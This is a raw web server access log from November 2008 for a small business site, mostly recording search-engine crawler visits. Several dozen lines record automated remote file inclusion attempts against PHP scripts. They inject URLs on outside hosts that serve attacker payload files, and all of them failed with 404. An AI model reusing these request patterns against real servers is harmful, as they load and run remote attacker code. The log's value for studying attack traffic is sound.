74.6.22.159 - - [04/Nov/2008:03:26:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.22.159 - - [04/Nov/2008:03:27:25 -0800] "GET /logs/access_070831.log HTTP/1.0" 200 248301 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:03:35:05 -0800] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:06:19:58 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:06:19:58 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [04/Nov/2008:06:19:58 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
210.109.103.145 - - [04/Nov/2008:08:49:02 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.autobutlerlifts.com"
210.109.103.145 - - [04/Nov/2008:08:49:02 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.autobutlerlifts.com"
83.2.108.2 - - [04/Nov/2008:08:51:07 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.autobutlerlifts.com"
83.2.108.2 - - [04/Nov/2008:08:51:07 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:09:25:02 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:09:25:02 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.164 - - [04/Nov/2008:09:39:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:09:44:38 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [04/Nov/2008:09:51:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:10:22:34 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:10:22:34 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:11:53:30 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:11:53:30 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
74.6.8.93 - - [04/Nov/2008:12:12:59 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.8.93 - - [04/Nov/2008:12:13:37 -0800] "GET /logs/access_071201.log HTTP/1.0" 200 171497 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
74.6.8.93 - - [04/Nov/2008:12:15:00 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com"
89.159.202.119 - - [04/Nov/2008:15:08:20 -0800] "GET /logs/access.log HTTP/1.0" 200 78193 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:15:24:29 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:15:24:30 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
70.255.170.233 - - [04/Nov/2008:16:05:05 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
70.255.170.233 - - [04/Nov/2008:16:05:05 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
66.249.71.81 - - [04/Nov/2008:19:15:07 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:19:15:07 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:19:15:08 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [04/Nov/2008:23:21:38 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [04/Nov/2008:23:21:38 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:00:18:56 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
198.87.2.45 - - [05/Nov/2008:00:48:36 -0800] "GET / HTTP/1.1" 200 916 "http://www.keywordspy.com/keyword-research/autobutlerlifts.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "autobutlerlifts.com"
198.87.2.45 - - [05/Nov/2008:00:48:36 -0800] "GET / HTTP/1.1" 200 916 "http://www.keywordspy.com/keyword-research/autobutlerlifts.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "autobutlerlifts.com"
198.87.2.45 - - [05/Nov/2008:00:48:36 -0800] "GET / HTTP/1.1" 200 916 "http://www.keywordspy.com/keyword-research/autobutlerlifts.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" "autobutlerlifts.com"
64.1.215.162 - - [05/Nov/2008:02:33:19 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 150673 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:02:41:55 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [05/Nov/2008:02:41:55 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:04:58:48 -0800] "GET /googlee916a1106382fa83.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [05/Nov/2008:04:58:48 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:04:58:48 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
217.148.93.40 - - [05/Nov/2008:05:46:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
217.148.93.40 - - [05/Nov/2008:06:10:06 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
217.148.93.40 - - [05/Nov/2008:06:10:06 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
217.148.93.40 - - [05/Nov/2008:06:10:06 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:08:29:00 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [05/Nov/2008:08:29:01 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [05/Nov/2008:08:29:01 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [05/Nov/2008:10:43:32 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [05/Nov/2008:10:43:32 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
64.1.215.164 - - [05/Nov/2008:11:05:54 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "autobutlerlifts.com"
64.1.215.162 - - [05/Nov/2008:11:14:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
89.248.102.164 - - [05/Nov/2008:12:06:23 -0800] "GET /logs/access.log HTTP/1.0" 200 84024 "-" "Wget/1.10.2" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:19 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:19 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:20 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:20 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:20 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:20 -0800] "GET /_private/ HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:21 -0800] "GET /logs/ HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:21 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:22 -0800] "GET /?N=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:22 -0800] "GET /?M=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:23 -0800] "GET /?S=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:24 -0800] "GET /?D=D HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:24 -0800] "GET /_private/?N=D HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:24 -0800] "GET /_private/?M=A HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:25 -0800] "GET /_private/?S=A HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:25 -0800] "GET /_private/?D=A HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:25 -0800] "GET /logs/?N=D HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:25 -0800] "GET /logs/?M=A HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:26 -0800] "GET /logs/?S=A HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:26 -0800] "GET /logs/?D=A HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:26 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:26 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:26 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:27 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:27 -0800] "GET /_private/?N=A HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:27 -0800] "GET /_private/?M=D HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:27 -0800] "GET /_private/?S=D HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:27 -0800] "GET /_private/?D=D HTTP/1.1" 200 530 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:28 -0800] "GET /logs/?N=A HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:28 -0800] "GET /logs/?M=D HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:28 -0800] "GET /logs/?S=D HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:28 -0800] "GET /logs/?D=D HTTP/1.1" 200 3089 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:29 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:29 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:29 -0800] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.90.118.101 - - [05/Nov/2008:12:44:29 -0800] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)" "autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:13:30:04 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.81 - - [05/Nov/2008:13:30:04 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
89.159.202.119 - - [05/Nov/2008:15:09:06 -0800] "GET /logs/access.log HTTP/1.0" 200 91111 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:15:19:58 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.80 - - [05/Nov/2008:15:19:58 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
70.255.170.233 - - [05/Nov/2008:16:05:42 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
70.255.170.233 - - [05/Nov/2008:16:05:42 -0800] "GET /logs/ HTTP/1.0" 200 3073 "-" "Wget/1.5.3.1" "autobutlerlifts.com"
71.6.198.91 - - [05/Nov/2008:16:34:15 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.autobutlerlifts.com"
71.6.198.91 - - [05/Nov/2008:16:34:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.autobutlerlifts.com"
71.6.198.91 - - [05/Nov/2008:16:34:15 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.autobutlerlifts.com"
71.6.198.91 - - [05/Nov/2008:16:34:21 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.autobutlerlifts.com"
71.6.198.91 - - [05/Nov/2008:16:34:21 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.autobutlerlifts.com"
71.6.198.91 - - [05/Nov/2008:16:34:21 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:37:36 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:37:36 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:37:36 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:38:44 -0800] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
83.64.132.254 - - [05/Nov/2008:16:39:02 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
83.64.132.254 - - [05/Nov/2008:16:39:02 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
83.64.132.254 - - [05/Nov/2008:16:39:02 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:39:21 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:39:21 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
219.85.63.226 - - [05/Nov/2008:16:39:21 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.autobutlerlifts.com"
83.64.132.254 - - [05/Nov/2008:16:40:06 -0800] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.autobutlerlifts.com"
72.52.170.160 - - [05/Nov/2008:16:42:51 -0800] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
72.52.170.160 - - [05/Nov/2008:16:42:51 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
72.52.170.160 - - [05/Nov/2008:16:42:51 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
83.223.106.11 - - [05/Nov/2008:16:45:11 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
83.223.106.11 - - [05/Nov/2008:16:45:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
83.223.106.11 - - [05/Nov/2008:16:45:11 -0800] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
72.52.170.160 - - [05/Nov/2008:16:48:19 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.autobutlerlifts.com"
83.223.106.11 - - [05/Nov/2008:16:49:09 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.autobutlerlifts.com"
